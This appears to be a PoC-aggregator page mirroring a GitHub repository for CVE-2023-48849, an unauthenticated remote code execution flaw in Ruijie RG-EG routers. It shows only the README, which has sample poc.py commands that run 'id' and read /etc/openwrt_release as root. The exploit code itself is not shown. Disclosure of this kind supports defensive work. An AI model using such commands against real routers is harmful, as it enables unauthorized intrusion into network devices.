CVE-2023-48849 PoC — Ruijie Networks RG-EG Series Routers 安全漏洞

Source

https://github.com/delsploit/CVE-2023-48849

Associated Vulnerability

Title:Ruijie Networks RG-EG Series Routers 安全漏洞 (CVE-2023-48849)
Description:Ruijie Networks RG-EG Series Routers是中国锐捷网络（Ruijie Networks）公司的一款网关产品。 Ruijie Networks RG-EG Series Routers EG_3.0(1)B11P216及之前版本存在安全漏洞，该漏洞源于存在远程代码执行漏洞。

Readme

# CVE-2023-48849

Ruijie EG Series Routers firmware <=EG_3.0(1)B11P216 allows unauthenticated attackers to remotely execute arbitrary code due to incorrect filtering.

```
$ python3 poc.py 192.168.1.1 'id'
uid=0(root) gid=0(root)
$ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release'
DISTRIB_TARGET='mediatek/eg310gh-e'
```

[DEMO](https://youtu.be/_EcT8_9rkNA)

File Snapshot


 [4.0K]  /data/pocs/f1b8c4db64f6ceb1339fcc75616b42428ee2aadf
└── [ 372]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!